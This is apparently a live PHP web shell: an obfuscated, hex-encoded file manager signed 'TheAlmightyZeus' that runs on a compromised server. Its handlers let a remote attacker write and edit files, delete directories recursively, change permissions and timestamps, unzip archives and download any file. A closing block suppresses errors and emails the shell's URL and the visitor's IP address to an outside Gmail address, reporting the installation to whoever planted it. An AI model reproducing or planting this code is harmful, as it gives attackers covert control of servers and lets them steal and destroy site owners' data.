if ($_POST["b64"] == "1") {
$ex = $GNJ[7]($_POST["e"]);
} else {
$ex = $_POST["e"];
}
$fp = $GNJ[17](uhex($_GET["e"]), 'w');
if ($GNJ[18]($fp, $ex)) {
OK();
} else {
ER();
}
$GNJ[19]($fp);
}
} elseif (isset($_GET["x"])) {
rec(uhex($_GET["x"]));
if ($GNJ[26](uhex($_GET["x"]))) {
ER();
} else {
OK();
}
} elseif (isset($_GET["t"])) {
echo $a_ . uhex($_GET["t"]) . $b_ . '
<form action="" method="post">
<input name="t" class="x" type="text" value="' . $GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))) . '">
' . $d_ . '
' . $c_;
if (!empty($_POST["t"])) {
$p = $GNJ[33]($_POST["t"]);
if ($p) {
if (!$GNJ[25](uhex($_GET["t"]), $p, $p)) {
ER();
} else {
OK();
}
} else {
ER();
}
}
} elseif (isset($_GET["k"])) {
echo $a_ . uhex($_GET["k"]) . $b_ . '
<form action="" method="post">
<input name="b" class="x" type="text" value="' . $GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4) . '">
' . $d_ . '
' . $c_;
if (!empty($_POST["b"])) {
$x = $_POST["b"];
$t = 0;
for ($i = strlen($x) - 1; $i >= 0; --$i) {
$t += (int) $x[$i] * pow(8, strlen($x) - $i - 1);
}
if (!$GNJ[12](uhex($_GET["k"]), $t)) {
ER();
} else {
OK();
}
}
} elseif (isset($_GET["l"])) {
echo $a_ . '+DIR' . $b_ . '
<form action="" method="post">
<input name="l" class="x" type="text" value="">
' . $d_ . '
' . $c_;
if (isset($_POST["l"])) {
if (!$GNJ[11]($_POST["l"])) {
ER();
} else {
OK();
}
}
} elseif (isset($_GET["q"])) {
if ($GNJ[10]("/tmp/Deobfuscator8a1gkz")) {
$GNJ[38]($GNJ[9]);
header("Location: " . basename($_SERVER['PHP_SELF']) . "");
exit;
} else {
echo $g;
}
} elseif (isset($_GET["n"])) {
echo $a_ . '+FILE' . $b_ . '
<form action="" method="post">
<input name="n" class="x" type="text" value="">
' . $d_ . '
' . $c_;
if (isset($_POST["n"])) {
if (!$GNJ[25]($_POST["n"])) {
ER();
} else {
OK();
}
}
} elseif (isset($_GET["r"])) {
echo $a_ . uhex($_GET["r"]) . $b_ . '
<form action="" method="post">
<input name="r" class="x" type="text" value="' . uhex($_GET["r"]) . '">
' . $d_ . '
' . $c_;
if (isset($_POST["r"])) {
if ($GNJ[26]($_POST["r"])) {
ER();
} else {
if ($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
OK();
} else {
ER();
}
}
}
} elseif (isset($_GET["z"])) {
$zip = new ZipArchive();
$res = $zip->open(uhex($_GET["z"]));
if ($res === TRUE) {
$zip->extractTo(uhex($_GET["d"]));
$zip->close();
OK();
} else {
ER();
}
} else {
echo '<table cellspacing="0" cellpadding="7" width="100%">
<thead>
<tr>
<th width="44%">[ NAME ]</th>
<th width="11%">[ SIZE ]</th>
<th width="17%">[ PERM ]</th>
<th width="17%">[ DATE ]</th>
<th width="11%">[ ACT ]</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<a class="ajx" href="?d=' . hex($d) . '&n">+FILE</a>
<a class="ajx" href="?d=' . hex($d) . '&l">+DIR</a>
</td>
</tr>
';
$h = "";
$j = "";
$w = $GNJ[13]($d);
if ($GNJ[28]($w) || $GNJ[29]($w)) {
foreach ($w as $c) {
$e = $GNJ[14]("\\", "/", $d);
if (!$GNJ[30]($c, ".zip")) {
$zi = '';
} else {
$zi = '<a href="?d=' . hex($e) . '&z=' . hex($c) . '">U</a>';
}
if ($GNJ[31]("{$d}/{$c}")) {
$o = "";
} elseif (!$GNJ[32]("{$d}/{$c}")) {
$o = " h";
} else {
$o = " w";
}
$s = $GNJ[34]("{$d}/{$c}") / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . " MB";
} else {
$s .= " KB";
}
if ($c != "." && $c != "..") {
$GNJ[8]("{$d}/{$c}") ? $h .= '<tr class="r">
<td>
<i class="far fa-folder m"></i>
<a class="ajx" href="?d=' . hex($e) . hex("/" . $c) . '">' . $c . '</a>
</td>
<td class="x">
dir
</td>
<td class="x">
<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
</td>
</tr>
' : ($j .= '<tr class="r">
<td>
<i class="far fa-file m"></i> 
<a class="ajx" href="?d=' . hex($e) . '&s=' . hex($c) . '">' . $c . '</a>
</td>
<td class="x">
' . $s . '
</td>
<td class="x">
<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
</td>
<td class="x">
<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
<a class="ajx" href="?d=' . hex($e) . '&e=' . hex($c) . '">E</a>
<a href="?d=' . hex($e) . '&g=' . hex($c) . '">G</a>
' . $zi . '
<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
</td>
</tr>
');
}
}
}
echo $h;
echo $j;
echo '</tbody>
<tfoot>
<tr>
<th class="et">
<a class="ajx" href="?d=' . hex($e) . '&y">REQUEST</a>
<a href="?d=' . hex($e) . '&q">EXIT</a>
</th>
<th class="et" width="11%"></th>
<th class="et" width="17%"></th>
<th class="et" width="17%"></th>
<th class="et" width="11%"></th>
</tr>
</tfoot>
</table>';
}
?>
</article>
<footer class="x">
©TheAlmightyZeus
</footer>
<?php
if (isset($_GET["1"])) {
echo $f;
} elseif (isset($_GET["0"])) {
echo $g;
} else {
NULL;
}
?>
<script>
$(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
</script>
</body>
</html>
<?php
function rec($j)
{
global $GNJ;
if (trim(pathinfo($j, PATHINFO_BASENAME), '.') === '') {
return;
}
if ($GNJ[8]($j)) {
array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
$GNJ[35]($j);
} else {
$GNJ[10]($j);
}
}
function dre($y1, $y2)
{
global $GNJ;
ob_start();
$GNJ[16]($y1($y2));
return $GNJ[36]();
}
function hex($n)
{
$y = '';
for ($i = 0; $i < strlen($n); $i++) {
$y .= dechex(ord($n[$i]));
}
return $y;
}
function uhex($y)
{
$n = '';
for ($i = 0; $i < strlen($y) - 1; $i += 2) {
$n .= chr(hexdec($y[$i] . $y[$i + 1]));
}
return $n;
}
function OK()
{
global $GNJ, $d;
$GNJ[38]($GNJ[9]);
header("Location: ?d=" . hex($d) . "&1");
exit;
}
function ER()
{
global $GNJ, $d;
$GNJ[38]($GNJ[9]);
header("Location: ?d=" . hex($d) . "&0");
exit;
}
function x($c)
{
global $GNJ;
$x = $GNJ[24]($c);
if (($x & 0xc000) == 0xc000) {
$u = "s";
} elseif (($x & 0xa000) == 0xa000) {
$u = "l";
} elseif (($x & 0x8000) == 0x8000) {
$u = "-";
} elseif (($x & 0x6000) == 0x6000) {
$u = "b";
} elseif (($x & 0x4000) == 0x4000) {
$u = "d";
} elseif (($x & 0x2000) == 0x2000) {
$u = "c";
} elseif (($x & 0x1000) == 0x1000) {
$u = "p";
} else {
$u = "u";
}
$u .= $x & 0x100 ? "r" : "-";
$u .= $x & 0x80 ? "w" : "-";
$u .= $x & 0x40 ? $x & 0x800 ? "s" : "x" : ($x & 0x800 ? "S" : "-");
$u .= $x & 0x20 ? "r" : "-";
$u .= $x & 0x10 ? "w" : "-";
$u .= $x & 0x8 ? $x & 0x400 ? "s" : "x" : ($x & 0x400 ? "S" : "-");
$u .= $x & 0x4 ? "r" : "-";
$u .= $x & 0x2 ? "w" : "-";
$u .= $x & 0x1 ? $x & 0x200 ? "t" : "x" : ($x & 0x200 ? "T" : "-");
return $u;
}
if (isset($_GET["g"])) {
$GNJ[38]($GNJ[9]);
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: Binary");
header("Content-Length: " . $GNJ[34](uhex($_GET["g"])));
header("Content-disposition: attachment; filename=\"" . uhex($_GET["g"]) . "\"");
$GNJ[37](uhex($_GET["g"]));
}
?>
<?php
@ini_set('output_buffering', 0);@ini_set('display_errors', 0);set_time_limit(0);ini_set('memory_limit', '64M');header('Content-Type: text/html; charset=UTF-8');$tujuanmail = 'galangganz76@gmail.com';$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>